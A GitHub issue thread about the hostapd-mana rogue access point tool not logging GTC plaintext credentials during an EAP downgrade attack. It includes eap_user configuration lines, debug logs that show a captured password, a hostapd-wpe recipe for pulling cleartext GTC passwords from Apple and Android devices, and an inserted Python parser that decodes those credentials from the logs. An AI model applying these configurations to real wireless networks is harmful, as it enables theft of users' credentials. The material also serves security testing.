sensepost/hostapd-mana

Creds not logged

Closed this issue · 7 comments

When performing an EAP dumb-down attack by asking for GTC, the plain text credentials do not appear in the log (also referenced in #12). I set the ennode configuration to a log file. Perhaps not all methods are stored in logs?

hostapd.eap_user:

"t" PEAP,GTC,TTLS-MSCHAPV2,MSCHAPV2,MD5,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS "1234test" [2]

Hostapd log:

EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=11): 02 0c 00 0b 01 68 61 63 6b 65 72
EAP-PEAP: received Phase 2: code=2 identifier=12 length=11
EAP-Identity: Peer identity - hexdump_ascii(len=6):
68 61 63 6b 65 72 hacker
MANA (EAP) : identity: hacker
...
EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=15): 02 0e 00 0f 06 70 61 73 73 77 6f 72 64 30 31
EAP-PEAP: received Phase 2: code=2 identifier=14 length=15
EAP-GTC: Response - hexdump_ascii(len=10):
70 61 73 73 77 6f 72 64 30 31 password01
EAP-GTC: Done - Failure
EAP-PEAP: Phase2 method failed
EAP-PEAP: PHASE2_METHOD -> FAILURE_REQ
EAP: EAP entering state METHOD_REQUEST
EAP: building EAP-Request: Identifier 15
EAP-PEAP: Encrypting Phase 2 data - hexdump(len=4): 04 0f 00 04
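The two "Decrypted Phase 2 EAP" hexdumps in the log above are plain EAP packets (4-byte header of code, identifier, length, then a type byte and type data). Decoding them shows why the debug output contains the GTC password even though nothing writes it to the credential log: this is an added example, not hostapd-mana code, and the sample log lines are constructed from the issue's own log.

```python
import re
import struct

# Matches hostapd's "Decrypted Phase 2 EAP - hexdump(len=N): xx xx ..." debug lines
HEXDUMP_RE = re.compile(r"Decrypted Phase 2 EAP - hexdump\(len=(\d+)\): ([0-9a-f ]+)$")

# EAP code and type numbers from RFC 3748 (GTC is type 6, Identity is type 1)
EAP_CODES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}
EAP_TYPES = {1: "Identity", 3: "Nak", 4: "MD5-Challenge", 6: "GTC", 25: "PEAP", 26: "MSCHAPv2"}

# Constructed sample: the two phase-2 hexdumps copied from the issue's log
SAMPLE_LOG = """\
EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=11): 02 0c 00 0b 01 68 61 63 6b 65 72
EAP-PEAP: received Phase 2: code=2 identifier=12 length=11
EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=15): 02 0e 00 0f 06 70 61 73 73 77 6f 72 64 30 31
EAP-GTC: Done - Failure
"""


def parse_eap(hexbytes: str) -> dict:
    """Parse one EAP packet given as the space-separated hex bytes of a hexdump line."""
    pkt = bytes.fromhex(hexbytes.replace(" ", ""))
    if len(pkt) < 4:
        raise ValueError("EAP header is 4 bytes: code, identifier, length")
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if length != len(pkt):
        raise ValueError(f"EAP length field {length} does not match {len(pkt)} captured bytes")
    info = {"code": EAP_CODES.get(code, code), "id": ident}
    if code in (1, 2) and length > 4:  # Request/Response carry a type byte, then type data
        info["type"] = EAP_TYPES.get(pkt[4], pkt[4])
        info["data"] = pkt[5:]  # for Identity and GTC this is the literal, unprotected string
    return info


def phase2_responses(log_lines) -> list:
    """Return the decoded inner EAP Responses found in hostapd debug output."""
    found = []
    for line in log_lines:
        m = HEXDUMP_RE.search(line)
        if not m:
            continue
        info = parse_eap(m.group(2))
        if int(m.group(1)) != len(bytes.fromhex(m.group(2).replace(" ", ""))):
            raise ValueError("hexdump len= does not match the bytes printed")
        if info["code"] == "Response":
            found.append(info)
    return found


if __name__ == "__main__":
    for resp in phase2_responses(SAMPLE_LOG.splitlines()):
        print(resp["type"], resp["data"].decode(errors="replace"))
```

Because GTC carries the token or password as bare bytes, its confidentiality rests entirely on the client having verified the server certificate before the PEAP tunnel was built.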

singe commented

Hi,
Did you find how to make the EAP dumb-down attack work in hostapd-mana? I see that the Android device just tries to use MSCHAPv2 instead of GTC, even when it does not have a 2-phase authentication method selected.
With freeradius-wpe I can make this attack work, but not with hostapd-mana.

Regards

I believe it was by changing the order of methods in the hostapd.eap_user file.

Hi,

Thanks for the reply, do you have an example file I can see?
I am not able to make this attack work.
Maybe it is using this line of configuration?
"t" PEAP,GTC,TTLS-MSCHAPV2,MSCHAPV2,MD5,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS "1234test" [2]

Regards

singe commented

I log PAP plaintext, not GTC. Will add it. Thanks.

https://twitter.com/W00Tock/status/1019251419310972930

Edit file "hostapd-wpe.eap_user" (You can replace PEAP with FAST)

PEAP [ver=1]
"t" GTC "password" [2]
./hostapd-wpe hostapd-wpe.conf -ddddd
-snip- EAP-GTC: Response password: -snip-

By configuring the eap_user file, you can request from Apple and Android devices a GTC clear text password, which is shown in the debug console but is currently not logged.

Thanks Singe, thought this might help you find that bug...